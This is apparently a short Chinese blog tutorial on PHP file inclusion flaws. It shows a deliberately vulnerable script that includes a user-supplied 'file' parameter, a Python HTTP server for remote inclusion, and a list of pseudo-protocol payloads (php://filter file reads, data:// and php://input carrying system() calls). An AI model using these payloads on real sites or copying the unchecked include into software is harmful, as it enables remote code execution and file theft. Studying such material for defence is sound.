文件包含漏洞
一、原理
新建1.php
1 2 3 4 5 6 7 8 9 10 11 | <?php $file = $_GET [file]; if (isset( $file )) { include ( $file ); } else { echo "sorry not" ; } ?> |
远程文件包含:
应用伪协议 http://
1 2 3 | python -m http.server 端口 //python3 *启用HTTP服务 python -m SimpleHTTPServer 端口 //python2 |
伪协议:
1 2 3 | http: // phar: // //只可以解压.zip压缩包 php: //filter/convert.base64-encode/resource=文件路径 //读文件zip://data://txt/plain,<?php system();?> data://txt/plain;base64,<?php system();?> data:,<?php system();?> ?file=data://text/plain,payload ?> //执行文件的包含方法包含了你的输入流,通过包含你输入的payload来实现目的。file://路径 //访问本地文件系统php:// //访问各个输入/输出流(I/O streams)php://input //访问请求的原始数据的只读流 ,请求体插入一句话 <?php system();?>php://output //访问请求的原始数据的只写流 ,请求体插入一句话 <?php system();?> |

【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?